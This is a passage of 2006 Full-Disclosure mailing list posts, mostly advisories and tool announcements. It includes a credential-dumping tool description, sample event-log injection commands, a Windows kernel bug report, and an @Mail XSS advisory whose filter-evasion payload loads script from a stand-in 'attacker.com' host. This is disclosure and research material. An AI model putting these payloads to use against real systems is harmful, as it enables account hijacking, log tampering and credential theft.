[Full-disclosure] [SECURITY] [DSA-1240-1] New links2 packages fix arbitrary shell command execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1240-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp December 21, 2006 - Package: links2 Vulnerability : insufficient escaping Problem type : remote Debian-specific: no CVE Id(s) : CVE-2006-5925 Debian Bug : 400718 Teemu Salmela discovered that the links2 character mode web browser performs insufficient sanitising of smb:// URIs, which might lead to the execution of arbitrary shell commands. For the stable distribution (sarge) this problem has been fixed in version 2.1pre16-1sarge1. For the upcoming stable distribution (etch) this problem has been fixed in version 2.1pre26-1. For the unstable distribution (sid) this problem has been fixed in version 2.1pre26-1. We recommend that you upgrade your links2 package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 3.1 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1.diff.gz Size/MD5 checksum:28658 a83c79990bbfb6f9ec26d737f767ee90 http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16.orig.tar.gz Size/MD5 checksum: 4217483 7baf4fc20cc244d80ead21cebff07d89 http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1.dsc Size/MD5 checksum: 841 ed4853334b7eebef055271df06cdcd7a alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_alpha.deb Size/MD5 checksum: 2110324 b3633fddb199c45339d3837bb0a519a0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_amd64.deb Size/MD5 checksum: 2040922 5fb402e6a833709741d20238346c7597 arm architecture (ARM) http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_arm.deb Size/MD5 checksum: 1996004 c7c79ddcb82d5758668ed71d74b9685f i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_i386.deb Size/MD5 checksum: 1997426 4c1ef611e31c57583f7471653962a84a m68k architecture (Motorola Mc680x0) http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_m68k.deb Size/MD5 checksum: 1904084 e5c777a07eaa88f4367b51d88c556a14 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_mips.deb Size/MD5 checksum: 2034596 22854de6eaf3aa1e392291760e85e5e8 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFFil26wM/Gs81MDZ0RAvPPAJ9cxthVIvv2w2UmXuzhiiPR21aOjgCgo7J8 vA5Gql5VNhz4zm/QV5K4pig= =JT/Q -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New Windows tool - PWDumpX v1.1 (with CacheDump functionality)
New Windows tool - PWDumpX v1.1 (with CacheDump functionality) Tool location: http://reedarvin.thearvins.com/tools/PWDumpX11.zip = Description: PWDumpX version 1.1 allows a user with administrative privileges to retrieve the domain password cache, password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems. If an input list of remote systems is supplied, PWDumpX will attempt to obtain the domain password cache, the password hashes and the LSA secrets from each remote Windows system in a multi-threaded fashion (up to 64 systems simultaneously). The domain password cache, password hashes and LSA secrets from remote Windows systems are encrypted as they are transfered over the network. No data is sent over the network in clear text. This tool is a completely re-written version of CacheDump, PWDump3e and LSADump2 which integrates suggestions/bug fixes for PWDump3e and LSADump2 found on various web sites, etc. Source code included. Credits: My intent with including the source code along with this tool is to give something back to the I.T. security community. I learned a lot while creating PWDumpX but I could not have done it without the original source code for CacheDump, PWDump2, PWDump3e, and LSADump2. So...thanks to the creators of these tools for being generous enough to include the source code with these tools so that hungry minds can learn new things. = Tool homepage: http://reedarvin.thearvins.com/tools.html Written by Reed Arvin [EMAIL PROTECTED]. Thank you, Reed Arvin [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] comparing information security to other industries
Hello, People, programmers, computers, software, design patterns, systems, and infrastructure are constantly changing, often being reinvented. As such, will never be stable. Concrete of a type is always the same and therefore predictable. One can state with certainly that a concrete slab will perform to design. This will ever be possible in IT. Many commercially produced software products don¹t have any warranty. Many even state that the software is not warranted for any function or purpose. ... The fact that the software does something that one thinks it should do is incidental. Regards, -- Jason Muskat | GCFA, GCUX - de VE3TSJ TechDude e. [EMAIL PROTECTED] m. 416 .414 .9934 http://TechDude.Ca/ From: KT [EMAIL PROTECTED] Date: Tue, 19 Dec 2006 12:16:29 -0800 To: full-disclosure@lists.grok.org.uk, [EMAIL PROTECTED] Subject: [WEB SECURITY] comparing information security to other industries So we have been dealing with information security from last 20 years and still the world is at large lost. We still see banks vulnerable to trivial XSS attacks and software broken by buffer overflows. How do we compare to other industries like construction, engineering, finance? What I am trying to figure out is how mature we are and how long will it take for to get stable? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Windows is very holy
Windows is very very holy. Microsoft may draw castles guarded by lions round PC's in adverts but we know better. Aaron ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NOD32 Antivirus CAB parsing Arbitrary Code Execution Advisory
n.runs AG http://www.nruns.com/ security at nruns.com n.runs-SA-2006.005 21-Dec-2006 Vendor: ESET, http://eset.com Affected Products: ESET NOD32 Antivirus Vulnerability: Arbitrary Code Execution (remote) Risk: HIGH Vendor communication: 2006/08/24initial notification of ESET 2006/08/28ESET Response 2006/08/29PGP keys exchange 2006/08/29PoC files sent to ESET 2006/09/06ESET initial feedback. 2006/09/08ESET confirmed the bug and fixed 2006/09/08ESET made available the updates Overview: Founded in 1992, ESET is a global provider of security software for enterprises and consumers. ESET's award-winning, antivirus software system, NOD32, provides real-time protection from known and unknown viruses, spyware, rootkits and other malware. NOD32 offers the smallest, fastest and most advanced protection available, with more Virus Bulletin 100% Awards than any other antivirus product. ESET was named to Deloitte's Technology Fast 500 five years running, and has an extensive partner network, including corporations like Canon, Dell and Microsoft. ESET has offices in Bratislava, SK; Bristol, U.K.; Buenos Aires, AR; Prague, CZ; San Diego, USA; and is represented worldwide in more than 100 countries. The broad product platform protects Windows, Linux, Novell and MS DOS machines. Description: A remotely exploitable vulnerability has been found in the file parsing engine. In detail, the following flaw was determined: - Heap Overflow through Integer Overflow in .CAB file parsing This problem can lead to remote arbitrary code execution if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in NOD32 Antivirus software versions prior to the update v.1.1743. Solution: The vulnerability was reported on Aug 24 and an update has been issued on Sep 08 to solve this vulnerability through the regular update mechanism. Credit: Bugs found by Sergio Alvarez of n.runs AG. The information provided is released by n.runs as is without warranty of any kind. n.runs except all warranties, either express or implied, expect for the warranties of merchantability. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Distribution or Reproduction of the information is provided that the advisory is not modified in any way. Copyright 2006 n.runs. All rights reserved. Terms of use. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Tele2 - Versatel and Vivendi - exploit PATCHED
This vulnerability has been patched successfully by the vendor as tests by various parties have demonstrated, more details here: http://cytrap.eu/blog/?p=133 Happy Holidays Urs E. Gattiker CyTRAP Labs and www.CASEScontact.org At 21:23 2006-10-04, you wrote: -- Message: 2 Date: Wed, 04 Oct 2006 13:56:27 +0200 Subject: [Full-disclosure] Tele2 - Versatel and Vivendi - exploit To: full-disclosure@lists.grok.org.uk Message-ID: [EMAIL PROTECTED] Content-Type: text/plain; charset=us-ascii; format=flowed Tele 2 has recently announced that it is selling its Benelux assets to Versatel and yesterday it informed the media that it intends to do the same with its French assets, selling those to Vivendi. The company that touts itself as providing economical broadband and telecommunication services does, however, have a slight problem regarding information security. A vulenrability is being taken advantage off by various groups of people and, in turn, this could harm home users that receive their broadband and fixed-line services from Tele2. In fact, several security features can be de-activated allowing a malicious user to take control of a user's PC, his broadband connection as well as his phone line as described here with a screen shot: http://cytrap.eu/blog/?p=57 This is another example where user's face risks regarding their internet connection they might not even be aware of. Another one of those is the recent Fon example also circulated on this list. Urs E. Gattiker CyTRAP Labs CASEScontact.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day
Dear full-disclosure@lists.grok.org.uk,
Since it's already wide spread on the public forums and exploit is
published on multiple sites and there is no way to stop it, I think
it's time to alert lists about this.
On the one of Russian forums:
http://www.kuban.ru/forum_new/forum2/files/19124.html
message was published by NULL about vulnerability in Windows on
processing MessageBox() with MB_SERVICE_NOTIFICATION flag and
message/caption beggining with \??\. Vulnerability seems to be memory
corruption in kernel and causes system crash or hang after few
attempts. It seems to happen because message is logged to event log
and may point to some problem with event logs processing.
Vulnerability details and code may be found here:
http://www.security.nnov.ru/Gnews944.html
There is potential remote exploitation vector if some service uses
user-supplied input for MessageBox() function. Messenger service is
not vulnerable in this way, because it prepends user-supplied input
with additional string.
I contacted Microsoft on this issue on December, 16.
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo-{ ^ }-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SinFP 2.06, now works under big-endian architectures
Hello, SinFP is a new approach to OS fingerprinting, which bypasses limitations that nmap has. More info: http://www.gomor.org/sinfp . SinFP has now 140 signatures. You can download it via CPAN, or via SourceForge: https://sourceforge.net/projects/sinfp Also, two benchmarks versus Nmap have been done: http://www.phocean.net/index.php/post/2006/12/17/SinFP http://www.computerdefense.org/?p=173 This new release has been tested under Solaris 8/SPARC, and Mac OS X/PPC. Example advanced usage: # sinfp.pl -kai www.heise.de P1: B0 F0 W0 O0 M0 P2: B3 F0x12 W4320 O0204010303000101080a4445414401010402 M1440 P3: B11123 F0x14 W0 O0 M0 IPv4: unknown ## ## Retry in offline active mode: ## # sinfp.pl -1 -f sinfp4-193.99.144.85.80.pcap -H P2: B3 F0x12 W4320 O0204010303000101080a4445414401010402 M1440 IPv4: BH0FH0WH2OH0MH1/P2: Unix: IRIX: 6.5 -- ^ ___ ___ http://www.GomoR.org/ -+ | / __ |__/ Systems Security Engineer | | \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]---| +-- Net::Frame = http://search.cpan.org/~gomor/ ---+ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fun with event logs (semi-offtopic)
Dear full-disclosure@lists.grok.org.uk,
There is interesting thing with event logging on Windows. The only
security aspect of it is event log record tampering and performance
degradation, but it may become sensitive is some 3rd party software is
used for automated event log analysis.
The problem is a kind of Format string vulnerability where
user-supplied input is used for event log record. For ReportEvent()
function %1, %2, etc have a special meaning and are replaced with
corresponding string from lpStrings. The problem is this can be done
recursively. That is, %2 argument can include itself. This fact doesn't
lead to any buffer overflow, but you can fill entire buffer with
relatively small argument.
Most services do not escape any user-supplied input then constructing
log event. You can see very interesting event log entries if you try
something like:
net send SOMEHOST %2
or
net use \\SOMEHOST\IPC$ /user:%1%2%3
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo-{ ^ }-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] n3td3v calls on month of bug campaigns to stop
[introduction] n3td3v is deeply sad at the new trend of morally accepted blackmail by the security community, known better as a month of bugs. sincere researchers are coming forward more frequently to threaten companies with a month of vendor bugs. because they are known to be sincere they are morally left off the hook from what is known by n3td3v to be straight forward blackmail. blackmail is illegal, for this reason n3td3v wishes to make the following recommendations: [1]bug a day for a month campaigns are blackmail on the part of the researcher, all should be outlawed by government. [2]n3td3v calls on the government to make it highly illegal and morally unacceptable to threaten a month of bugs for a vendor and its customers [3]security researchers think its fun but all it amounts to is blackmail [4]all blackmail attempts shouldn't be dressed up as harmless fun [5]governments need to wake up and swiftly arrest those making month of bug claims in the future [6]corporations and its consumers shouldn't be scared mongered and threatened by individuals [7]researchers shouldn't use their real name or real place of employment and expect exclusion from legal action against blackmail [8]researchers shouldn't be allowed to profit or gain career opportunities by such claims to action by the researcher [9]researchers should be taken into custody, questioned and have their hardware obtained for forensic analysis before a month of bugs is due to start [10]individuals threatening to carry out a month of bugs shouldn't be labelled as security researchers by the media and security experts [11]such individuals should be clearly labelled as criminals, malicious attackers and blackhats, no matter what other friendly or useful research they've carried out in the past. [media dork reference] http://news.com.com/2061-10793_3-6144833.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v calls on month of bug campaigns to stop
n3td3v wrote: [introduction] n3td3v is deeply sad at the new trend of morally accepted blackmail by the security community, known better as a month of bugs. sincere researchers are coming forward more frequently to threaten companies with a month of vendor bugs. because they are known to be sincere they are morally left off the hook from what is known by n3td3v to be straight forward blackmail. blackmail is illegal, for this reason n3td3v wishes to make the following recommendations: [1]bug a day for a month campaigns are blackmail on the part of the researcher, all should be outlawed by government. [2]n3td3v calls on the government to make it highly illegal and morally unacceptable to threaten a month of bugs for a vendor and its customers [3]security researchers think its fun but all it amounts to is blackmail [4]all blackmail attempts shouldn't be dressed up as harmless fun [5]governments need to wake up and swiftly arrest those making month of bug claims in the future [6]corporations and its consumers shouldn't be scared mongered and threatened by individuals [7]researchers shouldn't use their real name or real place of employment and expect exclusion from legal action against blackmail [8]researchers shouldn't be allowed to profit or gain career opportunities by such claims to action by the researcher [9]researchers should be taken into custody, questioned and have their hardware obtained for forensic analysis before a month of bugs is due to start [10]individuals threatening to carry out a month of bugs shouldn't be labelled as security researchers by the media and security experts [11]such individuals should be clearly labelled as criminals, malicious attackers and blackhats, no matter what other friendly or useful research they've carried out in the past. [media dork reference] http://news.com.com/2061-10793_3-6144833.html there's one extremely simple solution: write good code! furthermore, vendors who sell crap deserve to be blamed to do so. Mercedes-Benz' sales of their E-Class went down enourmously when the fact was known that it was extremely poorly engineered, especially wrt electrics. no one could fill a whole month of bugs (a bug/day) when the vendor did good (!) work. it's, again, a thing capitalism enforces. vendors sell immature soft-/hardware, and services, and let the customers do the beta testing. *that* should be defined illegal by governments! but guess what -- most, if not all of the western countries can be defined as fascist countries as (huge) corporations are the real entities in power. that given, the guys you call 'blackmailers' are like Robin Hood. they're heroes. (it was the same with brazil some months ago; they told the pharmacy corporations to sell their drugs for HIV infected people at a reasonable price to the brazilian govt, otherwise the govt would ignore patents and re-engineer and build the drugs themselves. again, the govt was perfectly right. however, pharmacy corporations' PR guys knew this and so they sold and sell the medicine to the price brazil was willing to pay...) -- Timo Schoeler | http://riscworks.net/~tis | [EMAIL PROTECTED] RISCworks -- Perfection is a powerful message Ex-ISP | RISC aficinados | Networking, Security, OpenBSD services GPG Key fingerprint = l33t What are you gonna do? Release the dogs?! Or the bees?! Or dogs with bees in their mouth so that when they bark they shoot bees at you? (Homer J. Simpson) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fun with event logs (semi-offtopic)
Heya lists 3APA3A, 3APA3A a écrit : Dear full-disclosure@lists.grok.org.uk, There is interesting thing with event logging on Windows. The only security aspect of it is event log record tampering and performance degradation, but it may become sensitive is some 3rd party software is used for automated event log analysis. The problem is a kind of Format string vulnerability where user-supplied input is used for event log record. For ReportEvent() function %1, %2, etc have a special meaning and are replaced with corresponding string from lpStrings. It looks more like a variable replacement (like $0 $1 ... in bash shell) than a format string issue to me. And it seems indeed to be a relevant information disclosure bug. Cheers, endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day
Dear lists,
in another Russian forum, Killer{R} made analysis on this issue using
Windows 2000 sources:
http://bugtraq.ru/cgi-bin/forum.mcgi?type=sbb=21m=140672
The problem is in win32k.sys' function GetHardErrorText, which tries to
prepare EXCEPTION data for event log, and seems to be some very old
debugging feature accidently left in production code since Windows 2000.
In Windows 2000 there is a peace of code like:
} else if ((asLocal.Length 4) !_strnicmp(asLocal.Buffer, \\??\\, 4)) {
strcpy( asLocal.Buffer, asLocal.Buffer+4 );
Killer{R} assumes the problem is in strcpy(), because it should not be
used for overlapping buffers, but at least ANSI implementation of strcpy
from Visual C should be safe in this very situation (copying to lower
addresses). May be code is different for Windows XP or vulnerability is
later in code.
--Thursday, December 21, 2006, 2:58:17 PM, you wrote to
full-disclosure@lists.grok.org.uk:
3 Dear full-disclosure@lists.grok.org.uk,
3 Since it's already wide spread on the public forums and exploit is
3 published on multiple sites and there is no way to stop it, I think
3 it's time to alert lists about this.
3 On the one of Russian forums:
3 http://www.kuban.ru/forum_new/forum2/files/19124.html
3 message was published by NULL about vulnerability in Windows on
3 processing MessageBox() with MB_SERVICE_NOTIFICATION flag and
3 message/caption beggining with \??\. Vulnerability seems to be memory
3 corruption in kernel and causes system crash or hang after few
3 attempts. It seems to happen because message is logged to event log
3 and may point to some problem with event logs processing.
3 Vulnerability details and code may be found here:
3 http://www.security.nnov.ru/Gnews944.html
3 There is potential remote exploitation vector if some service uses
3 user-supplied input for MessageBox() function. Messenger service is
3 not vulnerable in this way, because it prepends user-supplied input
3 with additional string.
3 I contacted Microsoft on this issue on December, 16.
--
~/ZARAZA
http://www.security.nnov.ru/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fun with event logs (semi-offtopic)
There is interesting thing with event logging on Windows. The only security aspect of it is event log record tampering and performance degradation, but it may become sensitive is some 3rd party software is used for automated event log analysis. I doubt this. The event logs don't contain the actual formatted string, because the template string is localized and only retrieved when the entry is displayed - what is logged is just a message id and the string inserts (see documentation for EVENTLOGRECORD). FormatMessage (which is used to build the full message to display to the user) isn't the culprit, either, because it doesn't operate recursively (that would have bizarre consequences, since FormatMessage also performs automatic line wrapping and indenting) - to prove it quickly and cheaply, make a copy of ntoskrnl.exe as %1.exe and try to run it: the error message you get back is prepared with FormatMessage (see kernel32, message table, entry 129), and it doesn't exhibit recursion I think this is just a fairly minor bug/feature of the standard event log viewer, and wouldn't affect log analyzers, unless they implement this counterintuitive behavior (that was probably coded to support some pathological case where a single pass of formatting wasn't enough). But I expect log analyzers would rather work with the message source + id than the formatted display message, anyway Most services do not escape any user-supplied input then constructing log event. They are not supposed to, in fact that would damage the log. A human being might be fooled (for example you could embed newlines and fake fields in multi-line messages), but an automatic analysis tool will always see exactly the parameters passed ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fun with event logs (semi-offtopic)
There is interesting thing with event logging on Windows. The only security aspect of it is event log record tampering and performance degradation, but it may become sensitive is some 3rd party software is used for automated event log analysis. Log tampering is a big concern, since it is trivial to change the meaning of logs without touching the .evt files themselves. However, there are other security concerns, at least when it comes to the event viewer. It downloads DLLs from remote systems when viewing remote logs, parses the message resources and uses them to determine the meaning of remote logs. Anyone played with fuzzing the PE file format? The problem is a kind of Format string vulnerability where user-supplied input is used for event log record. For ReportEvent() function %1, %2, etc have a special meaning and are replaced with corresponding string from lpStrings. It looks more like a variable replacement (like $0 $1 ... in bash shell) than a format string issue to me. And it seems indeed to be a relevant information disclosure bug. I have studied the FormatMessage() interface in my attempt to interpret event logs[1], but I had no idea that the %n elements were replaced recursively. That could be significant, since format strings *can* be included as a modifier for those elements. See [2] for more details. 3APA3A, have you tried to see if elements like %n!FORMAT! used recursively will invoke the wsprintf()-like behavior?? cheers, tim [1] http://projects.sentinelchicken.org/grokevt/ [2] http://msdn.microsoft.com/library/en-us/debug/base/formatmessage.asp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fun with event logs (semi-offtopic)
There is interesting thing with event logging on Windows. The only security aspect of it is event log record tampering and performance degradation, but it may become sensitive is some 3rd party software is used for automated event log analysis. I doubt this. The event logs don't contain the actual formatted string, because the template string is localized and only retrieved when the entry is displayed - what is logged is just a message id and the string inserts (see documentation for EVENTLOGRECORD). FormatMessage (which is used to build the full message to display to the user) isn't the culprit, either, because it doesn't operate recursively (that would have bizarre consequences, since FormatMessage also performs automatic line wrapping and indenting) - to prove it quickly and cheaply, make a copy of ntoskrnl.exe as %1.exe and try to run it: the error message you get back is prepared with FormatMessage (see kernel32, message table, entry 129), and it doesn't exhibit recursion I think this is just a fairly minor bug/feature of the standard event log viewer, and wouldn't affect log analyzers, unless they implement this counterintuitive behavior (that was probably coded to support some pathological case where a single pass of formatting wasn't enough). But I expect log analyzers would rather work with the message source + id than the formatted display message, anyway Most services do not escape any user-supplied input then constructing log event. They are not supposed to, in fact that would damage the log. A human being might be fooled (for example you could embed newlines and fake fields in multi-line messages), but an automatic analysis tool will always see exactly the parameters passed ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SQID v0.1 - SQL Injection Digger.
SQL injection digger is a command line program that looks for SQL injections and common errors in websites.Current version looks for SQL injections and common errors in website urls found by performing a google search. Sqiud can be downloaded from http://sqid.rubyforge.org. -- MSG // http://www.metaeye.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fun with event logs (semi-offtopic)
Dear Tim, --Thursday, December 21, 2006, 6:41:11 PM, you wrote to [EMAIL PROTECTED]: T 3APA3A, have you tried to see if elements like %n!FORMAT! used T recursively will invoke the wsprintf()-like behavior?? Yes, I did. It doesn't work. -- ~/ZARAZA Но ведь кому угодно могут прийти в голову яйца, пятки и епископы. (Лем) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fun with event logs (semi-offtopic)
Dear Michele Cicciotti, --Thursday, December 21, 2006, 6:20:54 PM, you wrote to full-disclosure@lists.grok.org.uk: There is interesting thing with event logging on Windows. The only security aspect of it is event log record tampering and performance degradation, but it may become sensitive is some 3rd party software is used for automated event log analysis. MC I doubt this. The event logs don't contain the actual formatted MC string, because the template string is localized and only retrieved MC when the entry is displayed - what is logged is just a message id MC and the string inserts (see documentation for EVENTLOGRECORD). MC FormatMessage (which is used to build the full message to display to MC the user) isn't the culprit, either, because it doesn't operate MC recursively (that would have bizarre consequences, since As I wrote, my message is semi-offtopic, because it's more fun than any security vulnerability here. Yes, probably this bug only affects event viewer itself. I don't understand how and why Microsoft achieved this effect in event viewer, which is, by the way, security tool, and if it's hard for different vendor to make same mistake. It doesn't look like Easter egg, but if FormatMessage does not recursion it needs to be specially coded and it does nothing except this bug. Bug, that needs to be specially coded is new funny bug category, isn't it? -- ~/ZARAZA http://www.security.nnov.ru/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [NETRAGARD-20061220 SECURITY ADVISORY] [EMAIL PROTECTED] WebMail Cross Site Scripting Vulnerabilitity]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Netragard, L.L.C Advisory* ***
Strategic Reconnaissance Team
http://www.netragard.com -- We make I.T. Safe.
[POSTING NOTICE]
- --
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.
a href=http://www.netragard.com/html/recent_research.html
Netragard Research
/a
[About Netragard]
- --
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools. This advisory is the
product of research done by the Strategic Reconnaissance Team.
[Advisory Information]
- --
Contact : Adriel T. Desautels
Researcher : Philippe C. Caturegli
Advisory ID : NETRAGARD-20061206
Product Name: @ Mail
Product Version : 4.51
Vendor Name : Calacode
Type of Vulnerability : XSS with filter evasion technique.
Effort : Easy
- --
Netragard Security Note:
Source code obfuscation does not reduce the risk profile of any
application as it has no impact on vulnerabilities that might exist
within a particular application. @Mail code was obfuscated using basic
obfuscation techniques.
[Product Description]
- --
@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device.
- --http://www.atmail.com--
[Technical Summary]
- --
@Mail does not properly sanitize email. While @Mail does pre-append
a DEFANGED_ tag to detected HTML tags, it does not properly detect
SCRIPT/XSS tags. This failure makes @Mail vulnerable to Cross-site
Scripting Attacks (XSS) via filter evasion.
[Technical Details]
- --
@Mail renders HTML emails by default. (Note: we did not find a way to
disable this feature.) The emails that are received are parsed by the
following code located in Global.pm which disarms basic XSS attacks.
- ---8--- SNIP Global.pm line 626 - 635 SNIP ---8---
my ( $I1I11I11I11I, $I1I111III1II );$_ =
$III1II1II1II-II1II1I11111($I1I1II1II1I11II1);if (//)
{s/(META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY)(\s|)/DEFANGED_$1$2/gi;
s/On(Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|KeyPress|KeyUp|
Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|Move|Reset|Resize|Select|Submit|
Unload)/DEFANGED_On$1/gi;
}if (/[\047][^\047\s]*#x?[1-9][0-9a-f]/i) {while (
/[\047][^\047\s]*#((4[6-9]|5[0-8]|6[4-9]|[78][0-9]|9[07-9]|1[0-1][0-9]|12[0-2]))/
)
{$I1I111III1II = chr($1);s/#$1;?/$I1I111III1II/g;
}while (
/[\047][^\047\s]*#(x(2[ef]|3[0-9a]|4[0-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]))/i
)
{$I1I111III1II = chr( hex(0$1) );s/#$1;?/$I1I111III1II/gi;
- ---8--- SNIP Global.pm line 626 - 635 SNIP ---8---
The above code will replace SCRIPT with DEFANGED_SCRIPT, but the
security created by the filtering process can be defeated. This is
because most web browsers assume that non-alpha-non-digit characters
are invalid after an HTML keyword and as such they are treated as
white-space. An attacker can use this knowledge to attack @Mail users.
Example:
\s matches any white space character (space and tab, as
well as \n and \r characters). SCRIPT is defanged by the
above sanitization however SCRIPT/XSS is not.
When SCRIPT/XSS hits a web browser it is translated back into
SCRIPT and executed by the browser. the /XSS becomes whitespace
to the browser. This is a very common filter evasion technique.
The following code SCRIPT/XSS src=//attacker.com/xss.js/SCRIPT
will then be executed when rendering an email with @Mail Webmail.
Please note that the email parser will also replace http:// by a a
href=..., breaking up our XSS
Re: [Full-disclosure] [fuzzing] NOT a 0day! Re: OWASP Fuzzing page
Gadi Evron a écrit : On Tue, 12 Dec 2006, Joxean Koret wrote: Wow! That's fun! The so called Word 0 day flaw also affects OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool with the file: This is NOT a 0day. It is a disclosed vulnerability in full-disclosure mode, on a mailing list (fuzzing mailing list). I am not sure why I got this 10 times now, I thought the days of these bounces were over. But I am tired of seeing every full-disclosure vulnerability called a 0day anymore. A 0day, whatever definition you use, is used in the wild before people are aware of it. It makes sense and I totally agree with you. But the fact is that the things change (and not allways in the right direction :-()... due to the society, money, research of popularity... Please remember us also the sense of the word hacker for instance, since nowadays it's often use to speak about bad guy/blackhat/pirate - i hope you'll agree that it's not the (our) sense /JA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fun with event logs (semi-offtopic)
